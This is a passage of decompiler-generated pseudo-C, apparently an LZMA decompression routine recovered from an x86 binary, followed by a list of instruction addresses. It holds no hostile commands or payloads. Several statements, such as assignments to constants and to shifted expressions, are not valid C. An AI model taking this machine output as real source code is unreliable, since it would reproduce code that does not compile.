                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												__eflags =  *(__ebp - 0x40) - 1;
                          												if( *(__ebp - 0x40) != 1) {
                          													__eax =  *(__ebp - 0x24);
                          													 *(__ebp - 0x80) = 0x16;
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x28);
                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          													__eax =  *(__ebp - 0x2c);
                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          													__eax = 0;
                          													__eflags =  *(__ebp - 0x38) - 7;
                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          													__al = __al & 0x000000fd;
                          													__eax = (__eflags >= 0) - 1 + 0xa;
                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x664;
                          													__eflags = __eax;
                          													 *(__ebp - 0x58) = __eax;
                          													goto L69;
                          												}
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 8;
                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t259;
                          												0 | _t259 = _t259 + _t259 + 9;
                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          												goto L76;
                          											case 0xa:
                          												goto L0;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												goto L69;
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t613 - 0x88) = _t533;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t613 - 0x88) = _t533;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L80;
                          											case 0x1b:
                          												L76:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t275 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t275;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t284 = __ebp - 0x64;
                          												 *_t284 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t284;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L80:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L81;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L81:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t535 = _t534 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}













                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x0040640f
                          0x0040640f
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
